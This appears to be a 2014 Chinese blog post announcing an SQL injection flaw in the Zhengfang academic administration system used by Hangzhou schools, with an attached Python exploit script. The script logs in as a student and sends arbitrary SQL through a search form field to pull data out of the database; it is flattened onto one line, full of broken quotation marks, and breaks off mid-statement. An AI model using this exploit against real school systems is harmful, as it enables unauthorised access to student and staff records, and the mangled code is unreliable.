杭州正方教务管理系统SQL注射漏洞,可查询任意数据并附带exp

二月 6th, 2014 by admin

#! /usr/bin/env python# coding=utf-8import sysimport requestsurl_root = “http://***.com/”url_login = “”url_query = “”cookie = {}def help():print “usage : “, sys.argv[0], “user”def login():global cookier = requests.get(url_root)t = r.headers["set-cookie"].split(”;”)[0].split(”=”)cookie[t[0]] = t[1]postdata = {}t = r.content[r.content.find("__viewstate") + 20:]t = t[:t.find(""")]postdata["__viewstate"] = tpostdata["textbox1"] = “****”postdata["textbox2"] = “****”postdata["button1"] = “”postdata["button2"] = ““postdata["radiobuttonlist1"] = “学生”.decode(”utf-8″).encode(”gbk”)r = requests.post(url_login, cookies=cookie, data=postdata)if len(r.history) == 0:print “登陆失败”sys.exit()def query(sql):global url_query, cookieresult = []header = {}header["referer"] = url_rootheader["host"] = “****”r = requests.get(url_query, cookies=cookie, headers=header)t = r.content.decode(”gbk”).encode(”utf-8″)t = t[t.find("__viewstate")+20:]t = t[:t.find(""")]postdata = {}postdata["__viewstate"] = tpostdata["dropdownlist5"] = “”postdata["dropdownlist3"] = “a.xh”postdata["dropdownlist4"] = “”postdata["dropdownlist1"] = “”postdata["dropdownlist2"] = “”postdata["button5"] = “查 询”.decode(”utf-8″).encode(”gbk”)postdata["textbox1"] = sqlr = requests.post(url_query, data=postdata, cookies=cookie, headers=header)t = r.content.decode(”gbk”).encode(”utf-8″)t = t[t.find("dropdownlist4"")+15:]t = t[:t.find("/select")]while true:pos = t.find(”"”)if pos == -1:breakt = t 相关阅读:

相关分类:

随机阅读: